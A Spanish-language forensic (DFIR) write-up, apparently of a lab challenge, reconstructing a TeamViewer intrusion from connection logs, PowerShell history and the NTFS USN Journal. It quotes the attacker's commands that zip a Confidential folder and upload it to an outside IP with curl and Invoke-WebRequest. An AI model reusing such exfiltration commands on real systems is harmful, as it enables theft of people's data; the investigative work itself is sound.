Análisis DFIR de acceso remoto, exfiltración de datos y eliminación de evidencias
Introducción
Las herramientas de acceso remoto forman parte esencial de la administración moderna de sistemas. Soluciones como TeamViewer permiten a administradores gestionar estaciones de trabajo y servidores a distancia, facilitando tareas de soporte técnico y mantenimiento.
Sin embargo, cuando un atacante obtiene acceso a estas herramientas —ya sea mediante credenciales comprometidas o configuraciones inseguras— puede utilizarlas para interactuar directamente con el sistema víctima sin desplegar malware adicional.
Este tipo de abuso de software legítimo se enmarca dentro de la categoría Living-off-the-Land (LotL), donde el adversario aprovecha herramientas nativas o autorizadas para minimizar la detección.
En el escenario analizado, un empleado reportó actividad sospechosa en su equipo: aplicaciones abriéndose automáticamente y movimiento del cursor sin interacción del usuario. La investigación posterior reveló que el sistema estaba siendo accedido de forma remota mediante TeamViewer.
El objetivo del análisis forense fue determinar:
- quién accedió al sistema
- cuándo ocurrió la intrusión
- qué acciones realizó el atacante
- si se produjo robo o eliminación de información
A partir del análisis de logs de TeamViewer, historial de PowerShell y artefactos del sistema de archivos NTFS, fue posible reconstruir la actividad completa del adversario.
1. Identificación de conexiones remotas de TeamViewer
El primer punto de pivote en la investigación fue el directorio de instalación de TeamViewer:
C:\Program Files\TeamViewer
Dentro de este directorio se encuentra el archivo:
Connections_incoming.txt
Este archivo registra las sesiones entrantes establecidas hacia el sistema.
📷 Evidencia

El archivo contiene registros básicos de conexiones, incluyendo:
- ID del cliente TeamViewer
- nombre del usuario remoto
- timestamp de inicio y fin de la sesión
Según la documentación del software, este log representa un historial simplificado de conexiones entrantes y constituye uno de los primeros artefactos a revisar durante investigaciones relacionadas con acceso remoto.
El contenido del archivo muestra:
565955529 a1l4m 04-07-2024 04:34:16 04-07-2024 04:34:56
565955529 a1l4m 04-07-2024 04:35:03 04-07-2024 04:45:11
De este registro se obtiene la siguiente información:
| Campo | Valor |
|---|---|
| TeamViewer ID | 565955529 |
| Usuario remoto | a1l4m |
| Equipo víctima | mmox |
| Tipo de conexión | RemoteControl |
El log revela dos conexiones consecutivas desde el mismo usuario.
La segunda sesión presenta una duración significativamente mayor, por lo que se priorizó su análisis.
2. Análisis del logfile técnico de TeamViewer
Aunque el archivo Connections_incoming.txt proporciona una visión inicial del incidente, no contiene suficiente granularidad temporal para reconstruir la actividad completa.
Para ello se analiza el archivo:
TeamViewer15_Logfile.log
Este logfile contiene eventos detallados generados por la aplicación durante la negociación, autenticación y establecimiento de sesiones remotas.
📷 Evidencia

Entre los eventos observados se identifica:
ConnectionGuard: incoming remote control session
Este registro indica que el sistema aceptó una sesión de control remoto entrante.
También se observa el evento:
Start Desktop process in session
Este evento confirma que el atacante obtuvo acceso interactivo al escritorio del sistema.
3. Identificación del primer acceso del atacante
El logfile permite identificar el momento exacto en el que se estableció la primera conexión remota.
📷 Evidencia

Registro clave:
ParticipantManagerBase::SetMyParticipantIdentifier
ConnectionGuard: incoming remote control in sessions
Timestamp asociado:
2024-07-04 04:34:16.699
Este valor coincide con el timestamp requerido en el desafío y representa el primer acceso exitoso del intruso al sistema comprometido. (Medium)
4. Identificación de la sesión principal del ataque
El atacante se conecta nuevamente pocos segundos después.
📷 Evidencia

Registro relevante:
ConnectionGuard: incoming remote control in sessions
sessionID = 536169703
La presencia del identificador de sesión permite correlacionar eventos posteriores asociados a la misma conexión.
Esta sesión corresponde al período durante el cual el atacante ejecutó la mayoría de las acciones dentro del sistema.
5. Finalización de la sesión remota
El final de la sesión también queda registrado en el logfile.
📷 Evidencia

Evento relevante:
SessionManagerDesktop::SessionTerminate
sessionID = 536169703
Timestamp:
04:45:11.202
Este registro marca el momento en que el atacante finalizó la conexión.
6. Duración total de la intrusión
Para determinar la duración real de la sesión se correlacionan los timestamps del logfile.
Inicio:
04:35:03.631
Fin:
04:45:11.202
📷 Evidencia

Duración calculada:
607.571 segundos
≈ 10 minutos
Aunque breve, una sesión interactiva de diez minutos proporciona tiempo suficiente para:
- explorar el sistema
- recopilar información
- transferir archivos sensibles
7. Análisis del historial de PowerShell
Una vez confirmada la sesión remota, el siguiente paso consistió en revisar artefactos que pudieran revelar acciones ejecutadas por el atacante.
Un artefacto particularmente útil es el historial de comandos de PowerShell PSReadline.
Ubicación:
C:\Users\mmox\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline
Archivo:
ConsoleHost_istory.txt
📷 Evidencia

Este archivo registra los comandos ejecutados en sesiones interactivas de PowerShell.
7.1 Compresión de información confidencial
Entre los comandos observados se identifica:
Compress-Archive -Path .\Confidential\ -DestinationPath output.zip
Este comando indica que el atacante comprimió el contenido de la carpeta:
Confidential
La compresión de datos antes de la exfiltración es una práctica común para:
- agrupar múltiples archivos
- reducir tamaño de transferencia
- simplificar el proceso de robo de información
7.2 Exfiltración de datos
Posteriormente se identifican comandos de transferencia de archivos:
curl 116.203.186.178 -T .\output.zip
y
Invoke-WebRequest -Uri http://116.203.186.178 -Method Put -InFile .\output.zip
📷 Evidencia

Estos comandos indican que el archivo comprimido fue transferido hacia un servidor remoto.
Dirección IP utilizada:
116.203.186.178
Esto confirma la exfiltración de información sensible desde el sistema comprometido.
8. Análisis del USN Journal
Para identificar modificaciones en el sistema de archivos se analizó el USN Journal, un registro interno del sistema de archivos NTFS que almacena cambios en archivos y directorios.
El artefacto fue procesado mediante la herramienta forense:
MFTECmd
Comando utilizado:
MFTECmd.exe -f $Extend\$J --csv resultados.csv
📷 Evidencia

El procesamiento generó una línea temporal con:
226,387 eventos del sistema de archivos
9. Reconstrucción de actividad con Timeline Explorer
El archivo CSV generado fue analizado mediante Timeline Explorer, otra herramienta del conjunto de utilidades de Eric Zimmerman.
📷 Evidencia

Filtrando por el directorio:
Confidential
se identificaron múltiples eventos relacionados con documentos sensibles.
Entre ellos:
Confidentiality-Agreement.doc
Este hallazgo confirma que el directorio previamente comprimido contenía información confidencial.
10. Eliminación de archivos por parte del atacante
El análisis del USN Journal también revela eventos de eliminación de archivos.
📷 Evidencia

Archivos eliminados:
Classified-Improvement-Plan-05.doc
Confidentiality-Agreement.doc
Secret.txt
Timestamp:
2024-07-04 04:42:09
Esto sugiere que el atacante eliminó los archivos tras completar la exfiltración, probablemente para reducir evidencias locales de la actividad maliciosa. (Medium)
Línea temporal del ataque
| Hora | Evento |
|---|---|
| 04:34:16 | Primera conexión TeamViewer |
| 04:35:03 | Inicio de sesión principal |
| 04:35 | Compresión de archivos |
| 04:40 | Exfiltración de datos |
| 04:42 | Eliminación de archivos |
| 04:45 | Fin de la sesión |
Conclusión
El análisis forense permitió reconstruir una intrusión realizada mediante acceso remoto a través de TeamViewer, seguida de robo y eliminación de información sensible.
Principales hallazgos:
- acceso remoto mediante TeamViewer
- usuario atacante a1l4m
- ID de TeamViewer 565955529
- duración de sesión aproximada 10 minutos
- compresión de archivos del directorio Confidential
- exfiltración hacia 116.203.186.178
- eliminación posterior de evidencias
Este caso demuestra cómo el análisis correlacionado de múltiples artefactos —incluyendo logs de aplicaciones, historial de comandos y registros del sistema de archivos— permite reconstruir con precisión la actividad de un atacante incluso cuando se utilizan herramientas legítimas del sistema.
